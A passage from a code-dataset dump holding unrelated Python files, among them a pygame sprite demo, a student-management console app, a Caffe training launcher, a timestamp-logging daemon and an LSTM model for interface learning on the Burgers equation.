zoneId,\n 'shardId': None,\n 'avId': -1 }\n messenger.send(self.doneEvent)\n elif retCode == 2:\n zoneId = base.localAvatar.lastHood\n self.doneStatus = {\n 'loader': ZoneUtil.getBranchLoaderName(zoneId),\n 'where': ZoneUtil.getToonWhereName(zoneId),\n 'how': 'teleportIn',\n 'hoodId': zoneId,\n 'zoneId': zoneId,\n 'shardId': None,\n 'avId': -1 }\n messenger.send(self.doneEvent)\n else:\n self.notify.error('unknown reason for exiting estate')\n\n \n def _EstateHood__popupKickoutMessage(self, msg):\n if self.popupInfo != None:\n self.popupInfo.destroy()\n self.popupInfo = None\n \n buttons = loader.loadModelOnce('phase_3/models/gui/dialog_box_buttons_gui')\n okButtonImage = (buttons.find('**/ChtBx_OKBtn_UP'), buttons.find('**/ChtBx_OKBtn_DN'), buttons.find('**/ChtBx_OKBtn_Rllvr'))\n self.popupInfo = DirectFrame(parent = hidden, relief = None, state = 'normal', text = msg, frameSize = (-1, 1, -1, 1), text_wordwrap = 10, geom = getDefaultDialogGeom(), geom_color = GlobalDialogColor, geom_scale = (0.88, 1, 0.75), geom_pos = (0, 0, -0.080000000000000002), text_scale = 0.080000000000000002, text_pos = (0, 0.10000000000000001))\n DirectButton(self.popupInfo, image = okButtonImage, relief = None, text = TTLocalizer.EstatePopupOK, text_scale = 0.050000000000000003, text_pos = (0.0, -0.10000000000000001), textMayChange = 0, pos = (0.0, 0.0, -0.29999999999999999), command = self._EstateHood__handleKickoutOk)\n buttons.removeNode()\n self.popupInfo.reparentTo(aspect2d)\n\n \n def _EstateHood__handleKickoutOk(self):\n self.popupInfo.reparentTo(hidden)\n\n \n def skyTrack(self, task):\n return SkyUtil.cloudSkyTrack(task)\n\n \n def startSky(self):\n SkyUtil.startCloudSky(self)\n if base.cloudPlatformsEnabled:\n self.loader.startCloudPlatforms()\n \n\n \n def stopSky(self):\n Hood.Hood.stopSky(self)\n self.loader.stopCloudPlatforms()\n\n\n","sub_path":"toontown/hood/EstateHood.py","file_name":"EstateHood.py","file_ext":"py","file_size_in_byte":5596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"23448764","text":"import csv\nimport os\n\n#os.chdir('insight_testsuite/tests/test_1/output')\n\nclass OutputHandler:\n def __init__(self, outputFilePath):\n self.outputFilePath = outputFilePath\n \n def save_to_csv(self,header,output):\n \"\"\"\n This function writes the final computed data into a csv file\n using the default csv package in python\n :param header: explicitly defined header row for the csv file\n :param output: the list of rows that need to be written to csv file\n \"\"\"\n with open(self.outputFilePath, 'w') as file:\n writer = csv.writer(file)\n writer.writerow(header)\n writer.writerows(output)\n \n path = os.getcwd()\n print(path)\n return 'Save success!'\n","sub_path":"src/storage/OutputHandler.py","file_name":"OutputHandler.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"309255429","text":"n=int(input(\"Podaj n: \"))\nm=int(input(\"Podaj m: \"))\n\nlistan=[]\nlistam=[]\nc=''\n\nfor i in range(n):\n x = str(input(\"Podaj element do listy 1: \"))\n listan.append(x)\n\nfor j in range(m):\n y = str(input(\"Podaj element do tablicy 2: \"))\n listam.append(y)\n\nfor i in range(n):\n for j in range(m):\n if listan[i]==listam[j]:\n c+=listan[i]\n c+=', '\n\n\nprint(\"Lista pierwsza to: \", listan)\nprint(\"Lista druga to: \", listam)\nif c == '':\n print(\"Nie ma czesci wspolnej\")\nelse:\n print(\"CZESCIA WSPOLNA TABLIC JEST: \", c)","sub_path":"lab05/cw_7.py","file_name":"cw_7.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"75647117","text":"import pygame\r\nimport random\r\n\r\nglobal BLACK, WHITE, BLUE, SCREEN_WIDTH, SCREEN_HEIGHT, GAME_FLOOR\r\n\r\n#set up constants for screen dimensions and colours\r\nBLACK = (0,0,0)\r\nWHITE = (255,255,255)\r\nBLUE = (0,0,255)\r\n\r\nSCREEN_WIDTH = 800\r\nSCREEN_HEIGHT = 600\r\nGAME_FLOOR = SCREEN_HEIGHT-100\r\n\r\n#create an object to act as a reference for our spritesheet\r\nclass SpriteSheet(object):\r\n\tdef __init__(self, filename):\r\n\t\t#load the spritesheet specified by filename \r\n\t\tself.sprite_sheet = pygame.image.load(filename).convert()\r\n\t\t#get dimension information for the sprite sheet\r\n\t\tself.rect = self.sprite_sheet.get_rect()\r\n\r\n\t#this function returns a section of the spritesheet as an image\r\n\tdef get_image(self,x,y,width,height):\r\n\t\t#create a blank surface to contain the sprite we're going to pull from the spritesheet\r\n\t\timage = pygame.Surface([width,height]).convert()\r\n\t\t#copy the specified section of spritesheet to the \"image\" surface\r\n\t\timage.blit(self.sprite_sheet, (0,0), (x, y, width, height))\r\n\t\t#set the colour key of the sprite that's going to be returned\r\n\t\timage.set_colorkey(WHITE)\r\n\t\t#return back the section of the sprite sheet we've specified\r\n\t\treturn image\r\n\r\nclass Player(pygame.sprite.Sprite):\r\n\t#set up two values to use to move the sprite along x and y axis\r\n\t#0 means the sprite isnt moving along that axis.\r\n\tchange_x = 0\r\n\tchange_y = 0\r\n\r\n\t#these arrays are to be used to contain the frames for the walk cycle\r\n\twalking_frames_left = []\r\n\twalking_frames_right = []\r\n\tdirection = \"R\"\r\n\r\n\tdef __init__(self):\r\n\t\tpygame.sprite.Sprite.__init__(self)\r\n\t\t#load the sprite sheet\r\n\t\tsprite_sheet = SpriteSheet(\"bret_run_sprite_sheet.png\")\r\n\t\t#specify how many frames are contained in the sprite sheet\r\n\t\tframes_in_walk_cycle=8\r\n\t\t#work out the width of each individual frame\r\n\t\tsprite_width=sprite_sheet.rect.width / frames_in_walk_cycle\r\n\t\t#as all sprites are on one line the height of each frame is the same as the sprite sheet\r\n\t\tsprite_height=sprite_sheet.rect.height\r\n\t\t\r\n\t\t#cycle through each frame in sprite sheet\r\n\t\tfor i in range(frames_in_walk_cycle):\r\n\t\t\t#assign current frame to a temporary frame image\r\n\t\t\ttemp_frame = sprite_sheet.get_image(i * sprite_width, 0, sprite_width, sprite_height)\r\n\t\t\t#add current frame to array of right-facing walking frame images\r\n\t\t\tself.walking_frames_right.append(temp_frame)\r\n\t\t\t#flip frame over on x-axis to get left facing image\r\n\t\t\ttemp_frame = pygame.transform.flip(temp_frame, True, False)\r\n\t\t\t#add current frame to array of left-facing wlaking frame images\r\n\t\t\tself.walking_frames_left.append(temp_frame)\r\n\r\n\t\t#set initial frame image\t\r\n\t\tself.image = self.walking_frames_right[0]\r\n\r\n\t\t#create rectangle object to hold frame info\r\n\t\tself.rect = self.image.get_rect()\r\n\r\n\tdef update(self):\r\n\t\t\r\n\t\t#move left/right\r\n\t\tself.fall_from_jump()\r\n\t\tself.rect.x += self.change_x\r\n\t\tpos = self.rect.x\r\n\t\t\r\n\t\t#set how many pixels we need to move by before walk cycle frame changes\r\n\t\tpixels_per_frame=30\r\n\r\n\t\t# This determines what the current walk cycle frame is. This is a bit of a fudge -\r\n\t\t# basically every position in the 'game world' has a walk cycle frame assigned to it\r\n\t\t# - this is worked out by dividing the current position (pos) by the number of pixels we\r\n\t\t# need to move by before the frame changes (pixels_per_frame) - to ensure that this always\r\n\t\t# gives a value within the range of walk cycle frames available, we divide that number by\r\n\t\t# the number of frames available and set the current frame to the remainder (done using 'modulus')\r\n\t\t\r\n\t\tif self.direction == \"R\": # if heading right, use the right-facing frames\r\n\t\t\tframe = (pos // pixels_per_frame) % len(self.walking_frames_right)\r\n\t\t\tself.image = self.walking_frames_right[frame]\r\n\t\telse: # otherwise use the left-facing frames\r\n\t\t\tframe = (pos // pixels_per_frame) % len(self.walking_frames_left)\r\n\t\t\tself.image = self.walking_frames_left[frame]\r\n\r\n\t\t# Move up/down\r\n\t\tself.rect.y += self.change_y\r\n\t\t\t\r\n\t# if player directs character to go left, then change x position by -6\r\n\tdef go_left(self):\r\n\t\tself.change_x = -6\r\n\t\tself.direction = \"L\"\r\n\t\r\n\t# if player directs character to go right, then change x position by +6\r\n\tdef go_right(self):\r\n\t\tself.change_x = 6\r\n\t\tself.direction = \"R\"\r\n\t\r\n\tdef fall_from_jump(self):\r\n\t\tif self.change_y == 0:\r\n\t\t\tself.change_y = 1\r\n\t\telse:\r\n\t\t\tself.change_y += .5\r\n\t\t\r\n\t\tif self.rect.y >= GAME_FLOOR - self.rect.height and self.change_y >= 0:\r\n\t\t\tself.change_y = 0\r\n\t\t\tself.rect.y = GAME_FLOOR - self.rect.height\r\n\t\t\t\r\n\tdef jump(self):\r\n\t\t\t# check player is standing on the floor\r\n\t\t\tif self.rect.bottom >= GAME_FLOOR:\r\n\t\t\t\tself.change_y = -10\r\n\t\t\t\r\n\t# if player stops directing character, then set the amount to change x by to 0\r\n\tdef stop(self):\r\n\t\tself.change_x = 0\r\n\r\n\r\ndef main():\r\n\t# set up initial game environment\r\n\tglobal SCREEN_WIDTH, SCREEN_HEIGHT, BLACK, WHITE, BLUE\r\n\tpygame.init()\r\n\tscreen = pygame.display.set_mode([SCREEN_WIDTH,SCREEN_HEIGHT])\r\n\tpygame.display.set_caption(\"Walk Cycle Test\")\r\n\r\n\t# create player\r\n\tplayer = Player()\r\n\r\n\t# set players initial x-axis position\r\n\tplayer.rect.x = 340\r\n\t# set players initial y-axis position to be at bottom of screen\r\n\tplayer.rect.y = GAME_FLOOR - player.rect.height\r\n\t\r\n\t# create a group to hold our sprites\r\n\tactive_sprite_list = pygame.sprite.Group()\r\n\t# add player sprite to the sprite group\r\n\tactive_sprite_list.add(player)\r\n\r\n\t# set up initial game loop \r\n\tdone = False\r\n\tclock = pygame.time.Clock()\r\n\r\n\t### - MAIN GAME LOOP - ###\r\n\twhile not done:\r\n\t\t# look for user input\r\n\t\tfor event in pygame.event.get():\r\n\t\t\t# exit if user closes window\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tdone = True\r\n\t\t\t\r\n\t\t\t# check to see if a key is pressed down\r\n\t\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\t\t# if left arrow is pressed, then go left\r\n\t\t\t\tif event.key == pygame.K_LEFT:\r\n\t\t\t\t\tplayer.go_left()\r\n\t\t\t\t# if right arrow is pressed, go right\r\n\t\t\t\tif event.key == pygame.K_RIGHT:\r\n\t\t\t\t\tplayer.go_right()\r\n\t\t\t\t# if up arrow is pressed, then jump\r\n\t\t\t\tif event.key == pygame.K_UP:\r\n\t\t\t\t\tplayer.jump()\r\n\t\t\t\t\r\n\t\t\t# check for when user releases key\r\n\t\t\tif event.type == pygame.KEYUP:\r\n\t\t\t\t# if the depressed key was the left arrow and the amount to move the\r\n\t\t\t\t# player character by is still set to a non zero amount, then stop the player\r\n\t\t\t\t# - this is to prevent the player character from continuing to move after the key is\r\n\t\t\t\t# released.\r\n\t\t\t\tif event.key == pygame.K_LEFT and player.change_x < 0:\r\n\t\t\t\t\tplayer.stop()\r\n\t\t\t\t# same as above but for right arrow\r\n\t\t\t\tif event.key == pygame.K_RIGHT and player.change_x > 0:\r\n\t\t\t\t\tplayer.stop()\r\n\r\n\t\t### Draw current level in buffer ####\r\n\t\tscreen.fill(BLACK)\r\n\t\t### Update Sprite Positions in buffer ###\r\n\t\tactive_sprite_list.update()\r\n\t\t### Draw Sprites ###\r\n\t\tactive_sprite_list.draw(screen)\r\n\r\n\t\t### Set game FPS ###\r\n\t\tclock.tick(60)\r\n\r\n\t\t### Draw buffer to screen ###\r\n\t\tpygame.display.flip()\r\n\t\r\n\t# Main game loop has exited here so we can tidy up and exit.\r\n\tpygame.quit()\r\n\r\nmain()\r\n\t\t\r\n\t\t\r\n","sub_path":"Projects/Old_2d_scroller_files/platformer_tests/walk_jump.py","file_name":"walk_jump.py","file_ext":"py","file_size_in_byte":6980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"151801508","text":"from json import load\nfrom copy import deepcopy\nfrom math import sqrt\n\ndef parse_json(file):\n located = {}\n on = {}\n\n #open json file for initial world\n f = open(file)\n fdata = load(f)\n\n #goes through each key from json file \n for key in fdata.keys():\n #set the world \n located[key] = fdata[key]\n on[key] = 'floor'\n\n return located, on \n\ndef distance(tuple1,tuple2): \n return sqrt((tuple1[0]-tuple2[0])**2 + (tuple1[1]-tuple2[1])**2)\n\nclass World:\n\n def __init__(self, world_file, robot_loc):\n self.located, self.on = parse_json(world_file)\n self.located['Robot'] = robot_loc\n self.cost = 0\n self.onRobot = 0\n self.action = None\n \n # returns list of drive successors\n def drive(self):\n successors = []\n if self.checkRobot(): \n #drive to each ballon locations\n curr_robot_loc = self.located['Robot']\n #drive to each balloon's location\n for eachKey in self.located.keys(): \n if eachKey is not 'Robot' :\n #get location of the ballon \n new_robot_loc = self.located[eachKey]\n #make copy of this self \n temp = deepcopy(self)\n #update the location (simulate the drive)\n temp.located['Robot'] = new_robot_loc\n # assign action to world\n temp.action = ('drive', new_robot_loc)\n #cost actually distance to drive based on robot's location \n temp.updateCost(distance(curr_robot_loc,new_robot_loc))\n #append temp to allSuccessors \n successors.append(temp)\n \n return successors\n\n def pickup1(self):\n successors = []\n for eachKey in self.located.keys():\n if (eachKey is not 'Robot') and (self.on[eachKey] is 'floor') and (self.located['Robot'] == self.located[eachKey]) and self.onRobot == 1:\n #pick up ballon (update where balloon on)\n #make copy of this self \n temp = deepcopy(self)\n # add to onRobot\n temp.onRobot += 1\n #change status of balloon\n temp.on[eachKey] = 'Robot'\n # assign action to world\n temp.action = ('pickup', NULL)\n #update cost of picking up a second balloon\n temp.updateCost(5)\n #append temp to allSuccessors \n successors.append(temp)\n\n return successors\n \n def pickup2(self):\n successors = []\n for eachKey in self.located.keys():\n if (eachKey is not 'Robot') and (self.on[eachKey] is 'floor') and (self.located['Robot'] == self.located[eachKey]) and self.onRobot == 0:\n #pick up the second balloon (update where the second balloon on)\n #make copy of this self \n temp = deepcopy(self)\n # add to onRobot\n temp.onRobot += 1\n # update on\n temp.on[eachKey] = 'Robot'\n # assign action to world\n temp.action = ('pickup', NULL)\n #update cost of picking up 2 balloon \n temp.updateCost(7)\n #append temp to allSuccessors \n successors.append(temp)\n\n return successors\n \n def putdown(self):\n successors = []\n for eachKey in self.located.keys():\n if (eachKey is not 'Robot') and (self.on[eachKey] is 'Robot') and (self.located['Robot'] == self.located[eachKey]) and self.onRobot > 0:\n #make copy of this self \n temp = deepcopy(self)\n #update the location \n temp.located[eachKey] = temp.located['Robot']\n # update status \n temp.on[eachKey] = 'floor'\n # assign action to world\n temp.action = ('putdown', NULL)\n #update cost of picking up 1 ballon \n temp.updateCost(5)\n #append temp to allSuccessors \n successors.append(temp)\n\n return successors\n\n def checkRobot (self): \n if 'Robot' in self.located.keys(): \n return True \n return False \n\n def getOn(self): \n return self.on\n\n def getLocated(self): \n return self.located \n \n def robotHasBalloon(self,lookAt): \n for eachKey in self.on.keys(): \n if (eachKey is not lookAt) and (self.on[eachKey] == 'Robot'):\n return True \n return False \n\n def updateCost(self,number):\n self.cost = number\n\n def getSuccessors(self):\n #list of all successors \n allSuccessors = [] \n\n #1. add drive action successors \n allSuccessors.extend(self.drive())\n\n #2.Check if robot can pick up a second ballon (any color)\n allSuccessors.extend(self.pickup1())\n \n #3.Check if robot can pick up a balloon (any color) from none\n allSuccessors.extend(self.pickup2())\n\n #4.Check if robot can put down a balloon\n allSuccessors.extend(self.putdown())\n\n return allSuccessors\n\n def distanceFromGoal(self, goal_locations):\n '''\n A hueristic that sums of the distance of the balloons with where they are and where they should be \n \n goal_locations: a dictionary of the final balloon locations {['Red': (5,7), ...]}\n '''\n sum_ = 0\n for balloon in goal_locations.keys():\n sum_ += distance(self.located[balloon], goal_locations[balloon])\n \n return sum_\n\n def getAction(self):\n return self.action\n\n def printWorld(self):\n print(\"this is where everything locate \", self.located)\n print(\"this is everything that are on \", self.on)\n print(\"cost to get to this world is \", self.cost)\n \n\n############ end of world class ###############\n\n\n\n\nw = World('simple.json', (1,3))\nw.printWorld()\nallChildren = w.getSuccessors()\nfor i in allChildren:\n i.printWorld()\n\n\n\n","sub_path":"actionPlaning/world-1.py","file_name":"world-1.py","file_ext":"py","file_size_in_byte":6159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"462177942","text":"\"\"\"\n使用字典:学生管理系统\n学生姓名管理系统:\n names_list = [\"王二狗\", \"Rose\", \"Jack\" ...]\n 增加学生姓名,删除,修改,查找。。\n append(),\n pop(index),remove(元素)\n name_list[index] = 新值\n\n字典:存储一组信息\n names_list = [\n {\n \"name\": \"王二狗\",\n \"age\" : 18,\n \"QQ\": \"1234567\"\n },\n {\n \"name\":\"Rose\",\n \"age\":19,\n \"QQ\":\"567878\"\n },\n .....\n ]\n\n\n 新增学生信息:\n\n 创建字典:stu_dict = {}\n 接收姓名,年龄,QQ\n stu_dict[\"name\"] = 姓名\n stu_dict[\"age\"] = 18\n stu_dict[\"QQ\"] = \"12345\"\n names_list.append(stu_dict)\n\n 删除:del_name = \"王二狗\"\n\n 修改:\n\n 查找:\n\"\"\"\n\n\nprint(\"------------------欢迎来到学生管理同学---------------\")\nprint(\"----------------请选择一下操作中的任意一项-----------\")\nprint(\"----------------1.添加学生-----------\")\nprint(\"----------------2.删除学生-----------\")\nprint(\"----------------3.修改学生-----------\")\nprint(\"----------------4查找学生-----------\")\nprint(\"----------------5.查看所有学生-----------\")\nprint(\"----------------6.退出-----------\")\nstudent = []\nwhile True:\n choose = int(input(\"请选择:\"))\n if choose == 1:\n name_student = input(\"请输入学生姓名:\")\n age_student = int(input(\"请输入学生年龄:\"))\n qq_number_student = input(\"请输入QQ号码:\")\n student.append(dict(name=name_student, age=age_student, qq_number=qq_number_student))\n print(\"添加成功\")\n elif choose == 2:\n name_student = input(\"请输入要删除的学生的名字:\")\n for stu in student:\n if stu[\"name\"] == name_student:\n print(type(stu))\n student.remove(stu)\n print(\"删除成功\")\n else:\n print(\"该学生不存在。。。。\")\n elif choose == 3:\n name_student = input(\"请输入要修改的学生的姓名:\")\n print(\"1.修改姓名\")\n print(\"2.修改年龄\")\n print(\"3.修改QQ号码\")\n select = int(input(\"请输入要修改的信息编号:\"))\n for stu in student:\n if stu[\"name\"] == name_student:\n if select == 1:\n new_name = input(\"请输入新名字:\")\n stu[\"name\"] = new_name\n elif select == 2:\n new_age = int(input(\"请输入新的年龄:\"))\n stu[\"age\"] = new_age\n elif select == 3:\n new_qq = input(\"请输入新的QQ号码:\")\n stu[\"qq_number\"] = new_qq\n print(\"修改成功\")\n elif choose == 4:\n name_student = input(\"请输入要查找的学生的名字:\")\n for stu in student:\n if stu[\"name\"] == name_student:\n print(stu)\n elif choose == 5:\n for stu in student:\n print(stu)\n elif choose == 6:\n print(\"系统退出\")\n break\n\n\n\n\n","sub_path":"20171114/work/work2_2.py","file_name":"work2_2.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"530194986","text":"# Default Imports\nfrom greyatomlib.python_intermediate.q05_read_csv_data.build import read_ipl_data_csv\nimport numpy as np\n\npath = 'data/ipl_matches_small.csv'\ndtype='|S20'\r\n# Enter Code Here\r\ndef get_total_extras():\r\n data=np.genfromtxt(path, skip_header=1,delimiter=\",\",dtype=dtype);\r\n x=data[:,17].astype(np.int)\r\n extrun = np.sum(x)\r\n return extrun\r\n","sub_path":"q08_get_total_extras/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"410542341","text":"#!/usr/bin/env python\nimport os, sys\nimport subprocess\n\ncaffe_bin = '/home/Working/caffe/build/tools/caffe' # PLEASE MODIFY TO YOUR LOCAL DIRECTORY\ntemplate = 'model/train.template.quad.prototxt'\n\nsubprocess.call('mkdir -p tmp/tmp_model', shell=True)\n\nbatch_size_train = 4\nbatch_size_test = 1\ncrop_width = 768\ncrop_height = 384\n# crop_width = 960\n# crop_height = 512\ninput_width = 960\ninput_height = 540\ntrain_data_lmdb = \"/home/Working/data/FlyingThingsLMDB\"\ntest_data_lmdb = \"/home/Working/data/FlyingThingsLMDB\"\n\nreplacement_list = {\n '$BATCH_SIZE_TRAIN': ('%d' % batch_size_train),\n '$BATCH_SIZE_TEST' : ('%d' % batch_size_test),\n '$TRAIN_DATA_LMDB' : ('%s' % train_data_lmdb),\n '$TEST_DATA_LMDB' : ('%s' % test_data_lmdb),\n '$CROP_WIDTH' : ('%d' % crop_width),\n '$CROP_HEIGHT' : ('%d' % crop_height),\n '$INPUT_WIDTH' : ('%d' % input_width),\n '$INPUT_HEIGHT' : ('%d' % input_height)\n}\n\nproto = ''\nwith open(template, \"r\") as tfile:\n proto = tfile.read()\n\nfor r in replacement_list:\n proto = proto.replace(r, replacement_list[r])\n\nwith open('tmp/tmp_model/train.prototxt', \"w\") as tfile:\n tfile.write(proto)\n\n\n\nos.system('mkdir training') \nos.chdir('training') \n\n# =========================================================\n\nmy_dir = os.path.dirname(os.path.realpath(__file__))\nos.chdir(my_dir)\n\nif not os.path.isfile(caffe_bin):\n print('Caffe tool binaries not found. Did you compile caffe with tools (make all tools)?')\n sys.exit(1)\n\nprint('args:', sys.argv[1:])\n\n\ntrained_filenames = os.listdir('./')\n\nif len(trained_filenames)==0:\n\t# start from scratch\n\targs = [caffe_bin, 'train', '-solver', '../model/solver.prototxt'] + sys.argv[1:]\nelse:\n\t# start from the latest training result\n\titers = []\n\tfor i in range(len(trained_filenames)):\n\t\ti0 = trained_filenames[i].find('iter_')\n\t\tif i0==-1:\n\t\t\tcontinue\n\t\ti1 = trained_filenames[i].find('.')\n\t\titers.append(int(trained_filenames[i][i0+5:i1]))\t\t\n\tlatest_iter = max(iters)\n\targs = [caffe_bin, \n\t\t'train', \n\t\t'-solver', '../model/solver.prototxt', \n\t\t'-snapshot', 'disp_iter_'+ str(latest_iter) + '.solverstate',\n\t\t] + sys.argv[1:]\n\t\ncmd = str.join(' ', args)\nprint('Executing %s' % cmd)\n\nsubprocess.call(args)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"454506495","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport os,sys\nimport time\n\ndef main():\n try:\n pid=os.fork()\n except OSError:\n pass\n if pid>0:\n sys.exit(0)\n\n os.setsid() #重设会话组\n os.chdir('/tmp') #切换自己的家目录\n os.umask(0) #重设umask\n for d in range(sys.getdlopenflags()):\n os.close(d)\n\n while True:\n with open('daemon.log','a+') as f:\n f.write(time.ctime()+'\\n')\n f.close()\n time.sleep(5)\n sys.exit(0)\n\nif __name__=='__main__':\n main()\n","sub_path":"py/daemon/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"308366200","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLearning from past (LP) interface learning for 1D Burgers problem with an \ninitial condition of square wave. \nLeft zone is truncated and compensated for by an LSTM model.\n\nThis correpsonds to Example 1 for the following paper:\n \"Interface learning of multiphysics and multiscale systems\",\n Physical Review E, 2020\n \nFor questions, comments, or suggestions, please contact Shady Ahmed,\nPhD candidate, School of Mechanical and Aerospace Engineering, \nOklahoma State University. @ shady.ahmed@okstate.edu\nlast checked: 11/10/2020\n\"\"\"\n\n#%% Import libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import linalg as LA\nfrom scipy.linalg import block_diag\n\nfrom numpy.random import seed\nseed(0)\n\nimport tensorflow as tf\ntf.random.set_seed(0)\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import LSTM\nfrom tensorflow.keras.models import load_model\n\nfrom sklearn.preprocessing import MinMaxScaler\nimport joblib\n\nimport os\nimport sys\n#%% Define Functions\n\n#-----------------------------------------------------------------------------!\n#compute rhs for numerical solutions\n# r = -u*u' + nu*u''\n#-----------------------------------------------------------------------------!\ndef rhsR(nx,dx,nu1,nu2,g1,g2,nxb,u):\n r = np.zeros(nx-nxb+1)\n r[1:nx-nxb] =(nu2/(dx*dx))*(u[2:nx-nxb+1] -2.0*u[1:nx-nxb] +u[0:nx-nxb-1])\\\n - g2*u[1:nx-nxb] \\\n -(1.0/3.0)*(u[2:nx-nxb+1]+u[0:nx-nxb-1]+u[1:nx-nxb])\\\n *(u[2:nx-nxb+1]-u[0:nx-nxb-1])/(2.0*dx)\n return r\n\n#-----------------------------------------------------------------------------#\n# Neural network Routines\n#-----------------------------------------------------------------------------#\ndef create_training_data_lstm(features,labels, m, n, lookback):\n # m : number of snapshots \n # n: number of states\n ytrain = [labels[i,:] for i in range(lookback,m)]\n ytrain = np.array(ytrain) \n \n xtrain = np.zeros((m-lookback,lookback,n))\n for i in range(m-lookback):\n a = np.copy(features[i,:])\n for j in range(1,lookback):\n a = np.vstack((a,features[i+j,:]))\n xtrain[i,:,:] = a\n return xtrain , ytrain\n\n\n#%% Main program:\n \n# Inputs\nnx = 4*1024 #spatial resolution\nlx = 1.0 #spatial domain\ndx = lx/nx\nx = np.linspace(0, lx, nx+1)\n\nnu1 = 1e-2 #control dissipation\nnu2 = 1e-4 #control dissipation\ng1 = 0 #friction\ng2 = 1 #friction\n\ntm = 1 #maximum time\ndt = 2.5e-4 #solver timestep\nnt = round(tm/dt)\nt = np.linspace(0, tm, nt+1)\n\nns = 4000 #number of snapshots to save\nfreq = round(nt/ns)\n\n\ntraining = 'true'\n#%% Read data\nnpt = 3 #number of points in input\n\nuFOM = np.zeros((7,ns+1,nx+1))\nxi = np.zeros((7,ns+1,2*npt+1))\nyi = np.zeros((7,ns+1,1))\n\nfor ii in range(7):\n nxb= int((ii+1)*nx/8)\n data = np.load('./Data/uFOM_xb='+str(nxb/nx)+'_.npy')\n uFOM[ii,:,:] = data.T\n for jj in range(npt):\n xi[ii,:,jj] = data[nxb+jj,:].T\n xi[ii,:,npt+jj] = x[nxb+jj]\n \n xi[ii,:,-1] = t\n yi[ii,:,0] = data[nxb,:]\n\n#%% Divide into training and testing\n#uTrain = uFOM[[0,2,4,6],:,:]\n#uTest = uFOM[[1,3,5],:,:] \n\nxTrain = xi[[0,2,4,6],:,:]\nyTrain = yi[[0,2,4,6],:,:]\n\nlookback = 1\n#%%\nif training == 'true': \n \n for i in range(4):\n features = xTrain[i,:,:] \n labels = yTrain[i,:,:]\n xt, yt = create_training_data_lstm(features, labels, features.shape[0], \\\n features.shape[1], lookback)\n if i == 0:\n xtrain = xt\n ytrain = yt\n else:\n xtrain = np.vstack((xtrain,xt))\n ytrain = np.vstack((ytrain,yt))\n \n #%% \n # Scaling data\n m,n = ytrain.shape # m is number of training samples, n is number of output features\n scalerOut = MinMaxScaler(feature_range=(-1,1))\n scalerOut = scalerOut.fit(ytrain)\n ytrain = scalerOut.transform(ytrain)\n \n for k in range(lookback):\n if k == 0:\n tmp = xtrain[:,k,:]\n else:\n tmp = np.vstack([tmp,xtrain[:,k,:]])\n \n scalerIn = MinMaxScaler(feature_range=(-1,1))\n scalerIn = scalerIn.fit(tmp)\n for i in range(m):\n xtrain[i,:,:] = scalerIn.transform(xtrain[i,:,:])\n \n #%%\n # Shuffling data\n perm = np.random.permutation(m)\n xtrain = xtrain[perm,:,:]\n ytrain = ytrain[perm,:]\n \n # create folder\n if os.path.isdir(\"./LSTM Model\"):\n print('LSTM models folder already exists')\n else: \n print('Creating LSTM models folder')\n os.makedirs(\"./LSTM Model\")\n \n # Removing old models\n model_name = 'LSTM Model/LSTM_LP_'+str(npt)+'.h5'\n if os.path.isfile(model_name):\n os.remove(model_name)\n \n # create the LSTM architecture\n model = Sequential()\n model.add(LSTM(20, input_shape=(lookback, features.shape[1]), return_sequences=True, activation='tanh'))\n #model.add(LSTM(40, input_shape=(lookback, features.shape[1]), return_sequences=True, activation='tanh'))\n #model.add(LSTM(40, input_shape=(lookback, features.shape[1]), return_sequences=True, activation='tanh'))\n model.add(LSTM(20, input_shape=(lookback, features.shape[1]), activation='tanh'))\n model.add(Dense(labels.shape[1]))\n \n # compile model\n model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mse'])\n \n # run the model\n history = model.fit(xtrain, ytrain, epochs=200, batch_size=64, validation_split=0.25)\n \n # evaluate the model\n scores = model.evaluate(xtrain, ytrain, verbose=0)\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n \n loss = history.history['loss']\n val_loss = history.history['val_loss']\n \n plt.figure()\n epochs = range(1, len(loss) + 1)\n plt.semilogy(epochs, loss, 'b', label='Training loss')\n plt.semilogy(epochs, val_loss, 'r', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n filename = 'LSTM Model/LP_loss.png'\n plt.savefig(filename, dpi = 200)\n plt.show()\n \n \n # Save the model\n model.save(model_name)\n \n # Save the scales\n filename = 'LSTM Model/LP_input_scaler_'+str(npt)+'.save'\n joblib.dump(scalerIn,filename) \n filename = 'LSTM Model/LP_output_scaler_'+str(npt)+'.save'\n joblib.dump(scalerOut,filename) \n\n\n#%% Testing\nmodel_name = 'LSTM Model/LSTM_LP_'+str(npt)+'.h5'\nmodel = load_model(model_name) \n\n# load scales\nfilename = 'LSTM Model/LP_input_scaler_'+str(npt)+'.save'\nscalerIn = joblib.load(filename) \nfilename = 'LSTM Model/LP_output_scaler_'+str(npt)+'.save'\nscalerOut = joblib.load(filename) \n\nuLSTM = 